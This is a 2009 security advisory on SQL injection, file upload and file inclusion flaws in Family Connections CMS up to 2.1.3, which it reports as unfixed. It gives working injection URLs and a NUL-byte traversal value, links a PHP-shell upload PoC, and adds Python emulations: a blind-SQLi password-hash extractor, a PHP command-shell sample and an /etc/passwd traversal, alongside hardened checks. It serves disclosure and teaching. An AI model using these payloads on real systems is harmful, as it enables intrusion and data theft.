
Family Connections <= 2.1.3 Multiple Remote Vulnerabilities


 Name              Family Connections
 Vendor            http://www.familycms.com
 Versions Affected <= 2.1.3

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2009-12-16

X. INDEX

 I.   ABOUT THE APPLICATION
 II.  DESCRIPTION
 III. ANALYSIS
 IV.  SAMPLE CODE
 V.   FIX
 VI.  DISCLOSURE TIMELINE


I. ABOUT THE APPLICATION

Keep your family "Connected" with this content management
system (CMS) designed specifically with families in mind.
Key features are: a message board, a photo gallery, a
blog-like "Family News" section, a calendar, an address
book and a recipe sharing section.
Each family member has their own personal settings, like
the ability to change the website's theme.
Now with Portuguese, Czech, English, Estonian, German, and
Spanish language support.


II. DESCRIPTION

Many fields are not properly sanitised and some checks can
be bypassed.


III. ANALYSIS

Summary:

 A) Multiple Blind SQL Injection
 B) Multiple Arbitrary File Upload
 C) Local File Inclusion

A) Blind SQL Injection

Every field I tested is vulnerable to Blind SQL Injection.
I cannot list all of the vulnerable files because there are
too many of them.
Most of the injections are into numeric parameters, so they
do not require magic_quotes_gpc (php.ini) to be set to Off:
no quote character is needed to break out of the query.
Because MySQL errors disclose the full installation path, an
attacker can also use SELECT ... INTO OUTFILE to write a file
into the remote file system, using the gallery directories as
the destination path, since the installation requires them to
be world-writable (777). This needs the FILE privilege for
the database user and write access for the mysqld process,
as the file is written by the database server, not by PHP.


B) Multiple Arbitrary File Upload

An upload handler must decide the file type from the file
name extension (and ideally from the file content), never from
the Content-Type HTTP header, because that header is supplied
by the client and can be set to anything. This CMS validates
uploads using only the Content-Type, so a PHP file sent with
an image Content-Type is accepted.


C) Local File Inclusion

In settings.php a user can choose a favourite theme. The
chosen theme is loaded with the include_once PHP function
from the themes/ directory, but the value is not validated,
so a directory traversal sequence lets the user include
arbitrary files.
The payload length is limited: the theme field in the
database is 25 characters long.


IV. SAMPLE CODE

A) Multiple Blind SQL Injection

Time-based (the condition is always true, so the response is
delayed by the BENCHMARK call; replacing the inner SELECT with
a query on real data turns the delay into a one-bit oracle):

http://site/path/profile.php?member=1 AND IF(ASCII((SELECT CHAR(90))) = 90, BENCHMARK(10000000, MD5(0x90)), NULL)

Boolean-based (the two requests return different pages):

http://site/path/messageboard.php?thread=1 AND 1=1
http://site/path/messageboard.php?thread=1 AND 1=0
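The boolean oracle above (AND 1=1 vs AND 1=0) is enough to read any value out of the database one bit at a time. The following script is an added example, not code from the advisory or from Family Connections: it emulates the vulnerable pattern (a numeric parameter concatenated straight into the query) on an in-memory SQLite database with a made-up table, then runs a binary-search extraction against it. The table and column names, the sample rows and the exact query text are assumptions; the predicate uses SQLite's unicode(substr(...)) where the MySQL payload on the page would use ASCII(SUBSTRING(...)).

```python
import sqlite3

def build_db():
    """Constructed stand-in for the CMS database. Table, columns and
    rows are assumptions for the example, not the real schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE fcms_users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO fcms_users VALUES (1, 'admin', '5f4dcc3b5aa765d9')")
    db.execute("INSERT INTO fcms_users VALUES (2, 'alice', 'e99a18c428cb38d5')")
    return db

def profile_lookup(db, member):
    """Emulates profile.php?member=<value>: the parameter is glued into
    the query without quoting or casting, so no quote character is
    needed and magic_quotes_gpc makes no difference."""
    sql = "SELECT username FROM fcms_users WHERE id = " + member
    return db.execute(sql).fetchone()

def oracle(db, predicate):
    """One bit per request: does the member-1 profile still render when
    the predicate is ANDed onto the WHERE clause?"""
    return profile_lookup(db, "1 AND (" + predicate + ")") is not None

def extract(db, subquery, max_len=64):
    """Recover the scalar result of `subquery` character by character.
    Each character takes about seven oracle requests (binary search
    over the 7-bit code). SQLite returns NULL for unicode('') past the
    end of the string, so every comparison fails and the search lands
    on 0, which terminates the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = build_db()
    print("admin hash:", extract(db, "SELECT password FROM fcms_users WHERE username='admin'"))
```

Against the live application the oracle function would issue the HTTP request and compare the response body with the known AND 1=1 page; the search loop is unchanged. The time-based form on the page replaces the page comparison with a response-time threshold and is useful when both branches render the same page.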

B) Multiple Arbitrary File Upload

A PoC that uploads a PHP shell can be downloaded here:
http://www.salvatorefresta.net/files/poc/PoC-FC213.c
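To show why the Content-Type check fails and what a correct check looks like, here is an added example (not code from the advisory or from the CMS): a check in the style the advisory describes, which trusts the client-supplied Content-Type, beside a check that decides from the stored extension and the file's leading bytes. The allowlists, the magic numbers table and the sample upload are assumptions constructed for the example.

```python
# Allowlists and magic numbers are assumptions for this example.
ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}
ALLOWED_TYPES = {"image/gif", "image/jpeg", "image/png"}
SCRIPT_EXT = {"php", "phtml", "php3", "php4", "php5"}
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

def weak_check(content_type, filename, data):
    """The pattern the advisory describes: accept the upload if the
    Content-Type of the multipart part is an image type. The attacker
    writes that header, so shell.php with image/gif passes."""
    return content_type in ALLOWED_TYPES

def strong_check(content_type, filename, data):
    """Decide from evidence the server controls. Content-Type is ignored.
    Rejects NUL bytes and path separators in the name, requires a single
    allowlisted extension, refuses any dot-segment naming a script
    extension (shell.php.gif), and checks the leading bytes."""
    if "\x00" in filename or "/" in filename or "\\" in filename:
        return False
    base, dot, ext = filename.rpartition(".")
    ext = ext.lower()
    if not dot or not base or ext not in ALLOWED_EXT:
        return False
    if any(seg.lower() in SCRIPT_EXT for seg in base.split(".")):
        return False
    return data.startswith(MAGIC[ext])

if __name__ == "__main__":
    # Constructed sample: a PHP file sent with a spoofed image Content-Type.
    shell = b"<?php system($_GET['c']); ?>"
    print("weak:  ", weak_check("image/gif", "shell.php", shell))
    print("strong:", strong_check("image/gif", "shell.php", shell))
```

The magic-byte check alone is not sufficient either: a valid GIF header followed by PHP code still executes if the web server hands .php files to the interpreter, which is why the extension of the name actually written to disk is the decisive control. Storing uploads under a server-generated name outside any script-executing directory removes the remaining risk.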


C) Local File Inclusion

Edit the POST request that saves the settings and send a
modified theme value such as the following, where \0 is a
literal NUL byte (%00 in the URL-encoded body):

../ReadMe.txt\0
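As an added example (not code from the advisory or from the CMS), the following emulates how the theme value reaches include_once and why the NUL byte and the 25-character column matter, next to a resolver that validates the value. The install path, the assumed file name appended after the theme directory (theme.php), the installed-theme list and the NUL-truncation behaviour (PHP before 5.3.4 stopped reading a path at the first NUL byte) are assumptions for the example.

```python
import posixpath

WEBROOT = "/var/www/fcms"               # assumed install path
THEMES_DIR = WEBROOT + "/themes"
THEME_COLUMN_MAX = 25                     # column length from the advisory
INSTALLED_THEMES = ("default", "blue")    # assumed for the example

def vulnerable_theme_path(theme):
    """Emulates include_once('themes/' . $theme . '/theme.php') with the
    value taken straight from the database. A value longer than the
    column is rejected here to stand in for the column limit. The
    split on NUL models the pre-5.3.4 PHP behaviour where the C-level
    open() sees only the bytes before the first NUL."""
    if len(theme) > THEME_COLUMN_MAX:
        raise ValueError("theme value exceeds the 25-character column")
    raw = "themes/" + theme + "/theme.php"
    return raw.split("\x00", 1)[0]

def resolve(relpath):
    """Where the include would actually land after '..' processing."""
    return posixpath.normpath(posixpath.join(WEBROOT, relpath))

def safe_theme_path(theme):
    """Hardened resolver: the value must name an installed theme, and the
    resolved path is still checked to lie under the themes directory."""
    if theme not in INSTALLED_THEMES:
        return None
    full = resolve("themes/" + theme + "/theme.php")
    if not full.startswith(THEMES_DIR + "/"):
        return None
    return full

if __name__ == "__main__":
    for payload in ("../ReadMe.txt\x00", "../../../../etc/passwd\x00"):
        print(repr(payload), len(payload), "->", resolve(vulnerable_theme_path(payload)))
    print("hardened:", safe_theme_path("../ReadMe.txt\x00"))
```

The length budget is what shapes the payload: "../ReadMe.txt\0" is 14 bytes and "../../../../etc/passwd\0" is 23, both under 25, while a deeper traversal or a long target name does not fit. Without the NUL byte the appended file name would be added to the target and the include would miss, which is why the advisory's payload ends in \0.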


V. FIX

No Fix.


VI. DISCLOSURE TIMELINE

2009-12-16 Bug discovered
2009-12-16 Initial vendor contact
2009-12-16 Advisory Release
